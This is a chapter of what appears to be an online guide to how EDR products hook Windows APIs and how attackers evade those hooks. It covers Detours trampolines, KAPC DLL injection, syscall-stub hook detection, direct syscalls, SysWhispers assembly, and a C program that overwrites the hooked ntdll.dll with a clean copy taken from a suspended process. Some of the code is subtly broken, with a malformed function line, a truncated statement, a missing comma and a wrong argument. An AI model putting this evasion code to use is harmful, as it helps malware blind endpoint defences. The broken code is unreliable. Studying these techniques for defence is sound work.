Function Hooking Dlls

Chapter 2

Majority of malicious actions that interact with the windows ecosystem are done through windows APIs. These APIs essentially are functions that carry out some sort of work inside the windows operating system.
Thus in order to detect and monitor what these APIs are doing, EDRs utilize function hooking Dlls to "hook" these APIs and intercept all the data passing through them.
Not only windows, the same case happens with linux, macos, solaris and every other operating system imaginable. But in this chapter, we will be focusing on windows apis and their kernel counterparts.

How Function Hooking Works

Code running in user mode typically leverages the Win32 API during execution to perform certain functions on the host, such as requesting a handle to another process.
However, in many cases, the functionality provided via Win32 can’t be completed entirely in user mode. Some actions, such as memory and object management, are the responsibility of the kernel.
To transfer execution to the kernel, x64 systems use a syscall instruction. But rather than implementing syscall instructions in every function that needs to interact with the kernel, Windows provides them via functions in "ntdll.dll". A function simply needs to pass the required parameters to this exported function; the function will, in turn, pass control into the kernel and then return the results of the operation. To detect malicious activity, EDRs "hook" these APIs.

In earlier versions of Windows, vendors (and malware authors) often placed their hooks on the System Service Dispatch Table (SSDT), a table in the kernel that holds the pointers to the kernel functions used upon invocation of a syscall. Security products would overwrite these function pointers with pointers to functions in their own kernel module used to log information about the function call and then execute the target function. They would then pass the return values back to the source application.
But with Windows XP in 2005, Microsoft introduced Kernel Patch Protection (KPP), also known as PatchGuard which prevented the patching of the SSDT. Thus EDRs started started hooking user mode Windows APIs to intercept data.
Because the functions performing the syscalls in ntdll.dll are the last possible place to observe API calls in user mode, EDRs will often hook these functions in order to inspect their invocation and execution.

By intercepting calls to these APIs, an EDR can observe the parameters passed to the original function, as well as the value returned to the code that called the API. Agents can then examine this data to determine whether the activity was malicious.
For example, to detect remote process injection, an agent could monitor whether the region of memory was allocated with read-write-execute permissions, whether data was written to the new allocation, and whether a thread was created using a pointer to the written data.

Microsoft Detours

While a large number of libraries make it easy to implement function hooks, most leverage the same technique under the hood. This is because, at its core, all function hooking involves patching unconditional jump (JMP) instructions to redirect the flow of execution from the function being hooked into the function specified by the developer of the EDR.
Microsoft Detours is one of the most commonly used libraries for implementing function hooks. Behind the scenes, Detours replaces the first few instructions in the function to be hooked with an unconditional JMP instruction that will redirect execution to a developer-defined function, also referred to as a detour.
This detour function performs actions specified by the developer, such as logging the parameters passed to the target function. Then it passes execution to another function, often called a trampoline, which executes the target function and contains the instructions that were originally overwritten. When the target function completes its execution, control is returned to the detour. The detour may perform additional processing, such as logging the return value or output of the original function, before returning control to the original process.

Examining a hooked function in a debugger, such as WinDbg, clearly shows the differences between a function that has been hooked and one that hasn’t. Shown below is the unhooked kernel32!SleepStub() function in WinDbg.

1:004> uf KERNEL32!SleepStub
KERNEL32!SleepStub:
00007ffa`9d6fada0 48ff25695c0600 jmp  qword ptr [ KERNEL32!imp_Sleep (00007ffa`9d760a10)
KERNEL32!_imp_Sleep:
00007ffa`9d760a10 d08fcc9cfa7f   ror byte ptr [rdi+7FFA9CCCh],1
00007ffa`9d760a16 0000           add byte ptr [rax],al
00007ffa`9d760a18 90             nop
00007ffa`9d760a19 f4             hlt
00007ffa`9d760a1a cf             iretd

This disassembly of the function shows the execution flow that we expect. When the caller invokes kernel32!Sleep(), the jump stub kernel32!SleepStub() is executed, long-jumping (JMP) to kernel32!_imp_Sleep(), which provides the real Sleep() functionality the caller expects.
But if it's being hooken on by an EDR, the execution flow is drastically altered; as shown below in the WinDbg output.

1:005> uf KERNEL32!SleepStub
KERNEL32!SleepStub:
00007ffa`9d6fada0 e9d353febf jmp 00007ffa`5d6e0178
00007ffa`9d6fada5 cc         int 3
00007ffa`9d6fada6 cc         int 3
00007ffa`9d6fada7 cc         int 3
00007ffa`9d6fada8 cc         int 3
00007ffa`9d6fada9 cc         int 3
00007ffa`9d6fadaa cc         int 3
00007ffa`9d6fadab cc         int 3

1:005> u 00007ffa`5d6e0178
00007ffa`5d6e0178 ff25f2ffffff jmp qword ptr [00007ffa`5d6e0170]
00007ffa`5d6e017e cc         int 3
00007ffa`5d6e017f cc         int 3
00007ffa`5d6e0180 0000       add byte ptr [rax],al
00007ffa`5d6e0182 0000       add byte ptr [rax],al
00007ffa`5d6e0184 0000       add byte ptr [rax],al
00007ffa`5d6e0186 0000       add byte ptr [rax],al
00007ffa`5d6e0188 0000       add byte ptr [rax],al

Instead of a JMP to kernel32!_imp_Sleep(), the disassembly contains a series of JMP instructions, the second of which lands execution in trampoline64!TimedSleep(). It's disassembly is shown below:

0:005> uf poi(00007ffa`5d6e0170)
trampoline64!TimedSleep
 10 00007ffa`82881010 48895c2408     mov qword ptr [rsp+8],rbx
 10 00007ffa`82881015 57             push rdi
 10 00007ffa`82881016 4883ec20       sub rsp,20h
 10 00007ffa`8288101a 8bf9           mov edi,ecx
 10 00007ffa`8288101c 4c8d05b5840000 lea r8,[trampoline64!'string' (00007ffa`828894d8)]
 10 00007ffa`82881023 33c9           xor ecx,ecx
 10 00007ffa`82881025 488d15bc840000 lea rdx,[trampoline64!'string' (00007ffa`828894d8)]
 10 00007ffa`8288102c 41b930000000   mov r9d,30h
 10 00007ffa`82881032 ff15f8800000   call qword ptr [trampoline64!_imp_MessageBoxW]
 10 00007ffa`82881038 ff15ca7f0000   call qword ptr [trampoline64!_imp_GetTickCount]
 10 00007ffa`8288103e 8bcf           mov ecx,edi
 10 00007ffa`8288103e 8bd8           mov ebx,eax
 10 00007ffa`82881040 ff15f0a60000   call qword ptr [trampoline64!TrueSleep]
 10 00007ffa`82881042 ff15ba7f0000   call qword ptr [trampoline64!_imp_GetTickCount]
 10 00007ffa`82881048 2bc3           sub eax,ebx
 10 00007ffa`8288104e f00fc105e8a60000 lock xadd dword ptr [trampoline64!dwSlept],eax
 10 00007ffa`82881050 488b5c2430     mov rbx,qword ptr [rsp+30h]
 10 00007ffa`82881058 4883c420       add rsp,20h
 10 00007ffa`8288105d 5f             pop rdi
 10 00007ffa`82881061 c3             ret

To collect metrics about the hooked function’s execution, this trampoline function evaluates the amount of time it sleeps, in CPU ticks, by calling the legitimate kernel32!Sleep() function via its internal trampoline64!TrueSleep() wrapper function. It displays the tick count in a pop-up message.
While this is a simple example, it shows the gist of how function hooking works. In a real EDR, functions important to adversary behavior, such as ntdll!NtWriteVirtualMemory() for copying code into a remote process, would be proxied in the same way, but the hooking might pay more attention to the parameters being passed and the values returned.

Injecting The Dll

Until Windows 8, many vendors opted to use the AppInit_Dlls infrastructure to load their DLLs into every interactive process (those that import user32.dll). Unfortunately, malware authors routinely abused this technique for persistence and information collection, and it was notorious for causing system performance issues. Microsoft no longer recommends this method for DLL injection and, starting in Windows 8, prevents it entirely on systems with Secure Boot enabled.
The most commonly used technique for injecting a function-hooking DLL into processes is to leverage a driver, which can use a kernel-level feature called kernel asynchronous procedure call (KAPC) injection to insert the DLL into the process.
When the driver is notified of the creation of a new process, it will allocate some of the process’s memory for an APC routine and the name of the DLL to inject. It will then initialize a new APC object, which is responsible for loading the DLL into the process, and copy it into the process’s address space.
Finally, it will change a flag in the thread’s APC state to force execution of the APC. When the process resumes its execution, the APC routine will run, loading the DLL.

Detecting Function Hooks

Hooked native API functions, especially the ones in ntdll.dll is really simple. Each function inside ntdll.dll consists of a syscall stub. The instructions that make up this stub are:

mov r10, rcx
mov eax, <syscall_number>
syscall
retn

This stub can also be seen in WinDbg's disassembler:

0:013> u ntdll!NtAllocateVirtualMemory
ntdll!NtAllocateVirtualMemory
00007fff`fe90c0b0 4c8bd1           mov r10,rcx
00007fff`fe90c0b5 b818000000       mov eax,18h
00007fff`fe90c0b8 f694259893fe7f01 test byte ptr [SharedUserData+0x308,1
00007fff`fe90c0c0 7503             jne ntdll!NtAllocateVirtualMemory+0x15
00007fff`fe90c0c2 0f05             syscall
00007fff`fe90c0c4 c3               ret
00007fff`fe90c0c5 cd2e             int 2Eh
00007fff`fe90c0c7 c3               ret

In the disassembly of ntdll!NtAllocateVirtualMemory(), we see the basic building blocks of the syscall stub. The stub preserves the volatile RCX register in the R10 register and then moves the syscall number that correlates to NtAllocateVirtualMemory(), or 0x18 in this version of Windows, into EAX.
Next, the TEST and conditional jump (JNE) instructions following MOV are a check found in all syscall stubs. Restricted User Mode uses it when Hypervisor Code Integrity is enabled for kernel-mode code but not user-mode code. You can safely ignore it in this context.
Finally, the syscall instruction is executed, transitioning control to the kernel to handle the memory allocation. When the function completes and control is given back to ntdll!NtAllocateVirtualMemory(), it simply returns.
Because the syscall stub is the same for all native APIs, any modification of it indicates the presence of a function hook. For example, see the below tampered syscall stub:

0:013> u ntdll!NtAllocateVirtualMemory
ntdll!NtAllocateVirtualMemory
00007fff`fe90c0b0 e95340baff       jmp 00007fff`fe4b0108
00007fff`fe90c0b5 90               nop
00007fff`fe90c0b6 90               nop
00007fff`fe90c0b7 90               nop
00007fff`fe90c0b8 f694259893fe7f01 test byte ptr [SharedUserData+0x308],1
00007fff`fe90c0c0 7503             jne ntdll!NtAllocateVirtualMemory+0x15
00007fff`fe90c0c2 0f05             syscall
00007fff`fe90c0c4 c3               ret
00007fff`fe90c0c5 cd2e             int 2Eh
00007fff`fe90c0c7 c3               ret

Notice here that, rather than the syscall stub existing at the entry point of ntdll!NtAllocateVirtualMemory(), an unconditional JMP instruction is present. EDRs commonly use this type of modification to redirect execution flow to their hooking DLL.
Thus, to detect hooks placed by an EDR, we can simply examine functions in the copy of ntdll.dll currently loaded into our process, comparing their entry-point instructions with the expected opcodes of an unmodified syscall stub.

Evading Function Hooks

Attackers can use a myriad of methods to evade function interception, all of which generally boil down to one of the following techniques:
- Making direct syscalls to execute the instructions of an unmodified syscall stub
- Remapping ntdll.dll to get unhooked function pointers or overwriting the hooked ntdll.dll currently mapped in the process
- Blocking non-Microsoft DLLs from loading in the process to prevent the EDR’s function-hooking DLL from placing its detours.
This is by no means an exhaustive list.

Direct Syscalls

By far, the most commonly abused technique for evading hooks placed on ntdll.dll functions is making direct syscalls. If we execute the instructions of a syscall stub ourselves, we can mimic an unmodified function.
To do so, our code must include the desired function’s signature, a stub containing the correct syscall number, and an invocation of the target function. This invocation uses the signature and stub to pass in the required parameters and execute the target function in a way that the function hooks won’t detect.
Below is the first file needed to execute direct syscalls.

; Assembly instructions for NtAllocateVirtualMemory()

NtAllocateVirtualMemory PROC
        mov r10, rcx
        mov eax, 0018h
        syscall
        ret
NtAllocateVirtualMemory ENDP

The first file in our project contains what amounts to a reimplementation of ntdll!NtAllocateVirtualMemory(). The instructions contained inside the sole function will fill the EAX register with the syscall number. Then, a syscall instruction is executed. This assembly code would reside in its own .asm file, and Visual Studio can be configured to compile it using the Microsoft Macro Assembler (MASM), with the rest of the project.
Even though we have our syscall stub built out, we still need a way to call it.

// To be included in the project header file
EXTERN_C NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle,
    PVOID BaseAddress,
    ULONG ZeroBits,
    PULONG RegionSize,
    ULONG AllocationType,
    ULONG Protect);

It should live in our header file, syscall.h, and will be included in our C source file.

#include "syscall.h"

void wmain()dg
{
    LPVOID lpAllocationStart = NULL;
    NtAllocateVirtualMemory(GetCurrentProcess(),
    &lpAllocationStart
    0,
    (PULONG)0x1000,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE);
}

The wmain() function in this file calls NtAllocateVirtualMemory() to allocate a 0x1000-byte buffer in the current process with read-write permissions. This function is not defined in the header files that Microsoft makes available to developers, so we have to define it in our own header file.
When this function is invoked, rather than calling into ntdll.dll, the assembly code we included in the project will be called, effectively simulating the behavior of an unhooked ntdll!NtAllocateVirtualMemory() without running the risk of hitting an EDR’s hook.
One of the primary challenges of this technique is that Microsoft frequently changes syscall numbers, so any tooling that hardcodes these numbers may only work on specific Windows builds. To help address this limitation, many developers rely on external sources to track these changes. For example, Mateusz Jurczyk of Google’s Project Zero maintains a list of functions and their associated syscall numbers for each release of Windows.
In December 2019, Jackson Thuraisamy published the tool SysWhispers, which gave attackers the ability to dynamically generate the function signatures and assembly code for the syscalls in their offensive tooling.
Shown below is the assembly code generated by SysWhispers when targeting the ntdll!NtCreateThreadEx() function on builds 1903 through 20H2 of Windows 10.

NtCreateThreadEx PROC
        mov rax, gs:[60h] ; Load PEB into RAX.
NtCreateThreadEx_Check_X_X_XXXX: ; Check major version.
         cmp dword ptr [rax+118h], 10
         je NtCreateThreadEx_Check_10_0_XXXX
          jmp NtCreateThreadEx_SystemCall_Unknown
NtCreateThreadEx_Check_10_0_XXXX: ;
          cmp word ptr [rax+120h], 18362
          je NtCreateThreadEx_SystemCall_10_0_18362
          cmp word ptr [rax+120h], 18363
           je NtCreateThreadEx_SystemCall_10_0_18363
           cmp word ptr [rax+120h], 19041
           je NtCreateThreadEx_SystemCall_10_0_19041
           cmp word ptr [rax+120h], 19042
           je NtCreateThreadEx_SystemCall_10_0_19042
           jmp NtCreateThreadEx_SystemCall_Unknown
NtCreateThreadEx_SystemCall_10_0_18362: ; Windows 10.0.18362 (1903)
           mov eax, 00bdh
           jmp NtCreateThreadEx_Epilogue
NtCreateThreadEx_SystemCall_10_0_18363: ; Windows 10.0.18363 (1909)
           mov eax, 00bdh
           jmp NtCreateThreadEx_Epilogue
NtCreateThreadEx_SystemCall_10_0_19041: ; Windows 10.0.19041 (2004)
           mov eax, 00c1h
           jmp NtCreateThreadEx_Epilogue
NtCreateThreadEx_SystemCall_10_0_19042: ; Windows 10.0.19042 (20H2)
           mov eax, 00c1h
           jmp NtCreateThreadEx_Epilogue
NtCreateThreadEx_SystemCall_Unknown: ; Unknown/unsupported version.
            ret
NtCreateThreadEx_Epilogue:
            mov r10, rcx
            syscall
            ret
NtCreateThreadEx ENDP

But this still doesn't resolve the issue as red-teamers would require to generate this stub for each and every version of windows and replace them whenever necessary. This process is tedious and unsustainable for large commercial environments. Thus we come to dynamically resolving syscall numbers.

Dynamically Resolving Syscall Numbers

In December 2020, a researcher known by modexpblog suggested another function-hook evasion technique: dynamically resolving syscall numbers at runtime, which kept attackers from having to hardcode the values for each Windows build.
This technique uses the following workflow to create a dictionary of function names and syscall numbers:
1. Get a handle to the current process’s mapped ntdll.dll.
2. Enumerate all exported functions that begin with Zw to identify system calls. Note that functions prefixed with Nt (which is more commonly seen) work identically when called from user mode. The decision to use the Zw version appears to be arbitrary in this case.
3. Store the exported function names and their associated relative virtual addresses.
4. Sort the dictionary by relative virtual addresses.
5. Define the syscall number of the function as its index in the dictionary after sorting.
This technique allows us to collect syscall numbers at runtime, insert them into the stub at the appropriate location, and then call the target functions as we otherwise would in the statically coded method.

Remapping ntdll.dll

Another common technique used to evade user-mode function hooks is to load a new copy of ntdll.dll into the process, overwrite the existing hooked version with the contents of the newly loaded file, and then call the desired functions.
This strategy works because the newly loaded ntdll.dll does not contain the hooks implemented in the copy loaded earlier, so when it overwrites the tainted version, it effectively cleans out all the hooks placed by the EDR.
The clean ntdll.dll can either be manually provided or extracted from a suspended process. Manually providing a ntdll.dll is risky as process generally don't load ntdll.dll from disk.
An alternative method to unhook ntdll.dll involves reading it from a suspended process. This works because EDRs require a running process to install their hooks and therefore a process created in a suspended state, will contain a clean ntdll.dll image allowing for the text section of the current process to be substituted with that of the suspended one.
Below is an example code that shows exactly that:

int wmain() {
    LPVOID pNtdll = nullptr;
    MODULEINFO mi;
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(STARTUPINFOW));
    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));

    GetModuleInformation(GetCurrentProcess(),
         GetModuleHandleW(L"ntdll.dll"),
         &mi, sizeof(MODULEINFO));

    PIMAGE_DOS_HEADER hooked_dos = (PIMAGE_DOS_HEADER)mi.lpBaseOfDll;
    PIMAGE_NT_HEADERS hooked_nt =
        (PIMAGE_NT_HEADERS)((ULONG_PTR)mi.lpBaseOfDll + hooked_dos->e_lfanew);

    CreateProcessW(L"C:\\Windows\\System32\\notepad.exe",
         NULL, NULL, NULL, TRUE, CREATE_SUSPENDED,
         NULL, NULL, &si, &pi);

    pNtdll = HeapAlloc(GetProcessHeap(), 0, mi.SizeOfImage);
    ReadProcessMemory(pi.hProcess, (LPCVOID)mi.lpBaseOfDll,
         pNtdll, mi.SizeOfImage, nullptr);

    PIMAGE_DOS_HEADER fresh_dos = (PIMAGE_DOS_HEADER)pNtdll;
    PIMAGE_NT_HEADERS fresh_nt =
           (PIMAGE_NT_HEADERS)((ULONG_PTR)pNtdll + fresh_dos->e_lfanew);

     for (WORD i = 0; i < hooked_nt->FileHeader.NumberOfSections; i++) {
           PIMAGE_SECTION_HEADER hooked_section =
                (PIMAGE_SECTION_HEADER)((ULONG_PTR)IMAGE_FIRST_SECTION(hooked_nt) +
                     ((ULONG_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));
 
      if (!strcmp((PCHAR)hooked_section->Name, ".text")){
           DWORD oldProtect = 0;
           LPVOID hooked_text_section = (LPVOID)((ULONG_PTR)mi.lpBaseOfDll +
                (DWORD_PTR)hooked_section->VirtualAddress);
 
           LPVOID fresh_text_section = (LPVOID)((ULONG_PTR)pNtdll +
                (DWORD_PTR)hooked_section->Virtual
           
           VirtualProtect(hooked_text_section,
                hooked_section->Misc.VirtualSize,
                PAGE_EXECUTE_READWRITE,
                &oldProtect);
 
           RtlCopyMemory(
                hooked_text_section,
                fresh_text_section,
                hooked_section->Misc.VirtualSize);
 
           VirtualProtect(hooked_text_section,
                hooked_section->Misc.VirtualSize,
                oldProtect,
                &oldProtect);
           }
     }
     
     TerminateProcess(pi.hProcess, 0);
     
     return 0;
}

This minimal example first opens a handle to the copy of ntdll.dll currently mapped into our process, gets its base address, and parses its PE headers. Next, it creates a suspended process and parses the PE headers of this process’s copy of ntdll.dll, which hasn’t had the chance to be hooked by the EDR yet.
At this point, we can parse the PE headers of the hooked ntdll.dll, looking for the address of the .text section, which holds the executable code in the image. Once we find it, we change the permissions of that region of memory so that we can write to it, copy in the contents of the .text section from the “clean” Dll, and revert the change to memory protection.
After this sequence of events completes, the hooks originally placed by the EDR should have been removed and the developer can call whichever function from ntdll.dll they need without the fear of execution being redirected to the EDR’s DLL.
As with all things, there is a trade-off here as well, as our new suspended process creates another opportunity for detection, such as by a hooked ntdll!NtCreateProcessEx(), the driver, or the ETW provider. It is also very rare to see a legitimate program create a suspended process.

While function hooking provides very useful information to an EDR, it is very susceptible to bypass due to inherent weaknesses in its common implementations. For that reason, most mature EDRs today consider it an auxiliary telemetry source and instead rely on more resilient sensors.

PreviousIntroduction NextProcess & Thread Notifications

Last updated 18 days ago